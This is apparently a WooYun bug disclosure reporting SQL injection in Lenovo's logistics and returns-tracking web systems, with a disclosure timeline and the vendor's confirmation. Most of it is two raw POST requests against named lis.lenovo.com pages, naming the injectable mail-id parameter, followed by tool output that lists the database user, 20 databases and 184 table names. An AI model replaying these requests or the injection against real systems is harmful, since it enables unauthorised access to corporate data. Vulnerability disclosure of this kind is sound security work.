乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-10: 细节已通知厂商并且等待厂商处理中 2014-01-13: 厂商已经确认,细节仅向厂商公开 2014-01-23: 细节向核心白帽子及相关领域专家公开 2014-02-02: 细节向普通白帽子公开 2014-02-12: 细节向实习白帽子公开 2014-02-24: 细节向公众公开
联想某海外多个系统存在SQL注射导致信息泄露,涉及到好几个系统,希望不是小厂商了。
站点:http://lis.lenovo.com/LISV2/ 物流信息系统
http://lis.lenovo.com/RTS/ RTS跟踪系统
与此漏洞的注入参数相同,因为涉及到多个系统,请厂商整站自查一下,有没有其他遗漏的子系统 WooYun: 联想某海外系统存在SQL注射导致信息泄露
POST http://lis.lenovo.com/RTS/forgetpwd.aspx HTTP/1.1Host: lis.lenovo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://lis.lenovo.com/RTS/forgetpwd.aspxConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 1095ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D3.5.40412.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Aen-US%3A1547e793-5b7e-48fe-8490-03a375b13a33%3Ade1feab2%3Af9cec9bc%3Aa67c2700%3Af2c8e708%3A8613aea7%3A3202a5a2%3Aab09e3fe%3A87104b7c%3Abe6fb298%3A720a52bf%3A589eaa30%3A698129cf%3Ae148b24b&__EVENTTARGET=btnProceed&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTAzODU1MjA5MQ9kFgICAw9kFgYCAQ8WAh4Fc3R5bGUFS2JhY2tncm91bmQtaW1hZ2U6dXJsKEltYWdlcy9SVFNfQmFubmVyXzkwMHg2MC5wbmcpO2hlaWdodDo2MHB4O3dpZHRoOjkwMHB4O2QCCw9kFgICAw8PFgIeBFRleHRkZGQCDQ8PFgIfAQUSIExFTk9WTyAtIFJUUyAyMDE0ZGRka9mr9YhGZYnk7Hkrn5U7Ioursgc%3D&__PREVIOUSPAGE=u9NeTchv2xiGhUWqAqY5Rfh-p6TsnKBCrgMFzXKfR0t07ShY7hUJlmma2elUYb0qvexCeXJXXSF3to0Apg9_Qrb3xck1&__EVENTVALIDATION=%2FwEWDgLRg6%2BjCQLQr4CuCgLjh8%2BzAgK9o7eoAQL7g77nDALn6oHDDAKG9P%2FCDAKUsvdnApTlme4OAo%2BfjvwCAvvjkIIIAruTnMMMAt7u54sIApP4%2BZoIqKrh2EWMzkkTXiqcyH1VtbSdECk%3D&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&cmb_User_Type=CUSTOMER&ValidatorCalloutExtender8_ClientState=POST http://lis.lenovo.com/LISV2/ HTTP/1.1Host: lis.lenovo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://lis.lenovo.com/LISV2/Cookie: ASP.NET_SessionId=z4lqclmhx42ljprmfqwm1dpeConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 908__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTIyMTc3ODA3D2QWAgIDD2QWBAIZDw8WAh4EVGV4dGVkZAIdDw8WAh8ABawBIExJUyAtICZjb3B5OyAyMDE0IExlbm92by4gQWxsIHJpZ2h0cyByZXNlcnZlZC4gfCA8YSBocmVmPSdodHRwOi8vd3d3Lmxlbm92by5jb20vbGVnYWwvaW4vZW4vJz5UZXJtcyBvZiB1c2U8L2E%2BIHwgPGEgaHJlZj0naHR0cDovL3d3dy5sZW5vdm8uY29tL3ByaXZhY3kvaW4vZW4vJz5Qcml2YWN5PC9hPmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQpDaGtTYXZlUHdkBQxjbG9zZURDUG9wdXBIEr%2F3U6mkHfQ0ajOYsF2X%2BdK%2FBeQrg5N9c7c%2F2%2FsPRg%3D%3D&__EVENTVALIDATION=%2FwEWDQK0pMqXCwKl1bKzCQKp2%2BqIAwKd%2B7qdDgLCyp3HCQLCgr8xAoLch8sJAr2jt6gBArnDi8QFAvuDvucMAufqgcMMAob0%2F8IMAt7u54sIXf42ZfGeGzLm1WECRtk0wKQIw6JuJ%2F73iT1J3pFrE7k%3D&txtUserName=&RF_UID_ValidatorCalloutExtender_ClientState=&txtPwd=&RF_PWD_ValidatorCalloutExtender_ClientState=&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submitcurrent user: 'lisuser'current database: 'Lenovo-LIS-India'available databases [20]:[*] Lenovo-B2B-ANZ[*] Lenovo-B2B-Asean[*] Lenovo-B2B-India[*] Lenovo-Claims-India[*] Lenovo-CRM-ANZ[*] Lenovo-CRM-Asean[*] Lenovo-Crm-India[*] Lenovo-DISK11-India[*] Lenovo-GSC-India[*] Lenovo-GSC-India-VAS[*] Lenovo-LIS-India[*] Lenovo-Marketing-India[*] Lenovo-REL-Pricing-India[*] Lenovo-SMB-Pricing-India[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdbDatabase: [Lenovo-LIS-India][184 tables]+------------------------------------------------+| dbo.AUDIT_LOG_DATA || dbo.AUDIT_LOG_TRANSACTIONS || dbo.AUDIT_UNDO || dbo.AUDIT_VIEW || dbo.[Jana.DB_V_Plant_Code] || dbo.[Jana.ECC_File_Det] || dbo.[Jana.LV_Activity] || dbo.[Jana.LV_LIS_ADD_SAP_UPLOAD] || dbo.[Jana.LV_LOTS_PSD_PARTSHIMENT] || dbo.[Jana.LV_LOTS_PSD_VS_BILLED] || dbo.[Jana.LV_REL_BILLING] || dbo.[Jana.LV_STO_REPORT] || dbo.[Jana.LV_TOP100CUSTOMER] || dbo.[Jana.LV_TOP100CUSTOMER_OLD] || dbo.[Jana.Sapinvoice_Auto_Upload] || dbo.[Jana.V_InvBillInfo] || dbo.[Jana.V_PSD_LIS] || dbo.[Jana.V_billinfo] || dbo.[Jana.lm_alert] || dbo.[Jana.lm_alerthierarchy] || dbo.[Jana.lm_broadcast] || dbo.[Jana.lm_carrieraccess] || dbo.[Jana.lm_city] || dbo.[Jana.lm_cityaccess] || dbo.[Jana.lm_contract] || dbo.[Jana.lm_controlfile] || dbo.[Jana.lm_cost_matrix] || dbo.[Jana.lm_custgroupchannel] || dbo.[Jana.lm_customeraccess] || dbo.[Jana.lm_custtypeaccess] || dbo.[Jana.lm_detentionreason] || dbo.[Jana.lm_distance] || dbo.[Jana.lm_documentaccess] || dbo.[Jana.lm_documentmanager] || dbo.[Jana.lm_duty] || dbo.[Jana.lm_escalation] || dbo.[Jana.lm_escalation_old] || dbo.[Jana.lm_escalationhierarchy] || dbo.[Jana.lm_escalationhierarchy_old] || dbo.[Jana.lm_function] || dbo.[Jana.lm_functionaccess] || dbo.[Jana.lm_gscreport] || dbo.[Jana.lm_holiday] || dbo.[Jana.lm_lock] || dbo.[Jana.lm_loggeduser] || dbo.[Jana.lm_menuaccess] || dbo.[Jana.lm_motrate] || dbo.[Jana.lm_parameter] || dbo.[Jana.lm_parametercategory] || dbo.[Jana.lm_plant] || dbo.[Jana.lm_preshipmentalert] || dbo.[Jana.lm_region] || dbo.[Jana.lm_regionaccess] || dbo.[Jana.lm_spacevariable] || dbo.[Jana.lm_user] || dbo.[Jana.lm_usergroup] || dbo.[Jana.lm_whaccess] || dbo.[Jana.lm_whcontact] || dbo.[Jana.lm_workingtime] || dbo.[Jana.ls_V_Report_SapVSDSR] || dbo.[Jana.lt_IOD] || dbo.[Jana.lt_IOD_BACKUP] || dbo.[Jana.lt_Pod_Link] || dbo.[Jana.lt_Top100CustomerList] || dbo.[Jana.lt_alertoutbound] || dbo.[Jana.lt_capex] || dbo.[Jana.lt_capexhistory] || dbo.[Jana.lt_dsr] || dbo.[Jana.lt_dsr_TSP] || dbo.[Jana.lt_dsr_TSP_HIS] || dbo.[Jana.lt_dsr_TSP_New] || dbo.[Jana.lt_dsrhistory] || dbo.[Jana.lt_grn] || dbo.[Jana.lt_grnhistory] || dbo.[Jana.lt_grnhistory_old] || dbo.[Jana.lt_incident] || dbo.[Jana.lt_motcr] || dbo.[Jana.lt_outbound] || dbo.[Jana.lt_permit] || dbo.[Jana.lt_podextractlog] || dbo.[Jana.lt_query] || dbo.[Jana.lt_sapinvoice] || dbo.[Jana.lt_sapinvoice_RSO] || dbo.[Jana.lt_sapinvoice_complete] || dbo.[Jana.lt_sapinvoice_complete_old] || dbo.[Jana.lt_sapinvoice_test] || dbo.[Jana.lt_sapinvoicehistory] || dbo.[Jana.lt_sapinvoicehistory_old] || dbo.[Jana.lt_stn] || dbo.[Jana.lt_supplierpayment] || dbo.[Jana.lt_supplierpaymenthistory] || dbo.[Jana.lt_upload] || dbo.[Jana.lt_uploadlog] || dbo.[Jana.lt_warehouse] || dbo.[Jana.lt_whspace] || dbo.[Jana.lv_DSR_Report1] || dbo.[Jana.lv_DSR_Report] || dbo.[Jana.lv_TSP_operation_Rpt] || dbo.[Jana.lv_TSP_operation_Rpt_Old] || dbo.[Jana.lv_carrier] || dbo.[Jana.lv_channel] || dbo.[Jana.lv_custgroup] || dbo.[Jana.lv_customer] || dbo.[Jana.lv_delstatus] || dbo.[Jana.lv_detentionreason] || dbo.[Jana.lv_dsr_vs_tsp_new] || dbo.[Jana.lv_dtatfailurecode] || dbo.[Jana.lv_endcustomer] || dbo.[Jana.lv_functions] || dbo.[Jana.lv_lis_ADD_upload] || dbo.[Jana.lv_mdtatfailurecode] || dbo.[Jana.lv_mot] || dbo.[Jana.lv_motcrstatus] || dbo.[Jana.lv_operation_Rpt] || dbo.[Jana.lv_otreason] || dbo.[Jana.lv_plant] || dbo.[Jana.lv_pod_vs_tsp] || dbo.[Jana.lv_pod_vs_tsp_new] || dbo.[Jana.lv_podfailurecode] || dbo.[Jana.lv_podperf] || dbo.[Jana.lv_podpref] || dbo.[Jana.lv_query] || dbo.[Jana.lv_rejectionreason] || dbo.[Jana.lv_shipcondition] || dbo.[Jana.lv_shippingcondition] || dbo.[Jana.lv_systemlock] || dbo.[Jana.lv_vendor] || dbo.[Jana.lv_warehouse] || dbo.[Jana.lv_workdaytype] || dbo.[Jana.lv_zone] || dbo.[Jana.new_view] || dbo.[Jana.sapvsdsr] || dbo.[Jana.temp_Desktop] || dbo.[Jana.temp_Net] || dbo.[Jana.temp_NoteBook] || dbo.[Jana.test] || dbo.[REALBASE-DB\\nasurudheen.ACCESS_CONTROL] || dbo.[REALBASE-DB\\nasurudheen.BKBL_RECP_Group] || dbo.[REALBASE-DB\\nasurudheen.BackLog] || dbo.[REALBASE-DB\\nasurudheen.Billing] || dbo.[REALBASE-DB\\nasurudheen.Cust_Info] || dbo.[REALBASE-DB\\nasurudheen.HBackLog] || dbo.[REALBASE-DB\\nasurudheen.HBilling] || dbo.[lisuser.R_Cust_Master] || dbo.[lisuser.ZPL_LABLE_TMPL] || dbo.[lisweb.AID_Counter] || dbo.[lisweb.LV_APPROVAL_LOG] || dbo.[lisweb.R_Access_Ctrl] || dbo.[lisweb.R_City] || dbo.[lisweb.R_Cust_RET_Item] || dbo.[lisweb.R_Cust_RTS_Details] || dbo.[lisweb.R_Delegation_Log] || dbo.[lisweb.R_Delegation_Profile] || dbo.[lisweb.R_File_Det] || dbo.[lisweb.R_PLANT_CODE] || dbo.[lisweb.R_Ret_Type_Master] || dbo.[lisweb.R_Return_Detail] || dbo.[lisweb.R_Return_Flow] || dbo.[lisweb.R_Return_Item] || dbo.[lisweb.R_Return_Item_oldBackup] || dbo.[lisweb.R_Signup_User] || dbo.[lisweb.R_WH_Recv_Profile] || dbo.[lisweb.R_Workflow_Profile] || dbo.[lisweb.Sap_Billed_Data] || dbo.[lisweb.V1_CUST_Return_Qty_Check] || dbo.[lisweb.V1_CUST_Return_Qty_Det] || dbo.[lisweb.V1_TSP_Return_Qty_Check] || dbo.[lisweb.V1_TSP_Return_Qty_Det] || dbo.[lisweb.V_Cust_VS_TSP_REPORT] || dbo.[lisweb.V_SAP_BILLED_DATA] || dbo.[lisweb.V_SAP_DISTINCT_COUNT] || dbo.[lisweb.V_TSP_VS_RETDET_Report] || dbo.[lisweb.v1_customer_request] || dbo.[lisweb.v_customer_Request] || dbo.[lisweb.v_customer_request1] || dbo.[lisweb.v_customer_request_RPT] || dbo.[reluser.MASTER_DATA_RPT] || dbo.[reluser.V_Master_Det] || dbo.[reluser.access_control] || dbo.[reluser.log_table] || dbo.[reluser.modp_cus_inv] || dbo.[reluser.modp_cus_inv_item] || dbo.[reluser.status_board] || dbo.sysdiagrams |+------------------------------------------------+
已经证明
过滤多个子系统的参数
危害等级:高
漏洞Rank:15
确认时间:2014-01-13 13:56
感谢您对联想信息安全工作的支持 我们会尽快修复漏洞
暂无
